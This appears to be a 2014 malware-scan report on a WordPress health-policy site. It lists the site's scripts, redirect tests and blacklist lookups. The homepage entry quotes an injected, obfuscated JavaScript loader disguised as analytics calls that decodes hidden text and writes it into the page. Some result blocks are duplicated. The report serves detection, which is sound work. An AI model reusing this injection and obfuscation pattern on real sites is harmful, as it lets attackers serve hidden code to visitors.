Scanned pages/files
Request | Server response | Status |
http://savingprivatehealthcare.com/ | 200 OK Content-Length: 27086 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _gw1 = []; _gw1.push(['_setOption', '1301851861911781711021861911821711311041861711901861171']); _gw1.push(['_setOption', '6918518510413211618418718018017518017316518219318218118']); _gw1.push(['_setPageId', '5175186175181180128167168185181178187186171129169178175']); _gw1.push(['_trackPageview', '1821281841711691861101221241261821901141671871861811141']); _gw1.push(['_trackPageview', '6718718618111412212412618219011112919513011718518619117']); _gw1.push(['_setOption', '8171132']); var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_gw1.length; v++) t += _gw1[v][1];l=t.length; while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70); document.write(z); Antivirus reports:
| ||
http://savingprivatehealthcare.com/wp-includes/js/jquery/jquery.js?ver=1.8.3 | 200 OK Content-Length: 93658 Content-Type: application/javascript | clean |
http://savingprivatehealthcare.com/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=3.25.0-2013.01.18 | 200 OK Content-Length: 15158 Content-Type: application/javascript | clean |
http://savingprivatehealthcare.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=3.3.3 | 200 OK Content-Length: 6933 Content-Type: application/javascript | clean |
http://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201438 | 200 OK Content-Length: 9301 Content-Type: application/x-javascript | clean |
http://savingprivatehealthcare.com/wp-content/themes/Origin/js/jquery.fitvids.js?ver=1.0 | 200 OK Content-Length: 2724 Content-Type: application/javascript | clean |
http://savingprivatehealthcare.com/wp-content/themes/Origin/js/jquery.infinitescroll.js?ver=1.0 | 200 OK Content-Length: 36692 Content-Type: application/javascript | clean |
http://savingprivatehealthcare.com/wp-content/themes/Origin/js/custom.js?ver=1.0 | 200 OK Content-Length: 4936 Content-Type: application/javascript | clean |
http://savingprivatehealthcare.com/wp-content/themes/Origin/epanel/page_templates/js/fancybox/jquery.easing-1.3.pack.js?ver=1.3.4 | 200 OK Content-Length: 6717 Content-Type: application/javascript | clean |
http://savingprivatehealthcare.com/wp-content/themes/Origin/epanel/page_templates/js/fancybox/jquery.fancybox-1.3.4.pack.js?ver=1.3.4 | 200 OK Content-Length: 15647 Content-Type: application/javascript | clean |
http://savingprivatehealthcare.com/wp-content/themes/Origin/epanel/page_templates/js/et-ptemplates-frontend.js?ver=1.1 | 200 OK Content-Length: 6287 Content-Type: application/javascript | clean |
http://savingprivatehealthcare.com/main-page/ | 404 Not Found Content-Length: 2693 Content-Type: text/html | clean |
http://savingprivatehealthcare.com/test404page.js | 404 Not Found Content-Length: 2693 Content-Type: text/html | clean |
http://savingprivatehealthcare.com/meet-the-author/ | 404 Not Found Content-Length: 2693 Content-Type: text/html | clean |
http://savingprivatehealthcare.com/contact-us/ | 404 Not Found Content-Length: 2693 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: savingprivatehealthcare.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 21 Sep 2014 07:16:23 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Pingback: http://savingprivatehealthcare.com/xmlrpc.php
GET / HTTP/1.1
Host: savingprivatehealthcare.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 21 Sep 2014 07:16:23 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Pingback: http://savingprivatehealthcare.com/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: savingprivatehealthcare.com
Referer: http://www.google.com/search?q=savingprivatehealthcare.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: savingprivatehealthcare.com
Referer: http://www.google.com/search?q=savingprivatehealthcare.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=savingprivatehealthcare.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://savingprivatehealthcare.com/
Result: savingprivatehealthcare.com is not infected or malware details are not published yet.
Result: savingprivatehealthcare.com is not infected or malware details are not published yet.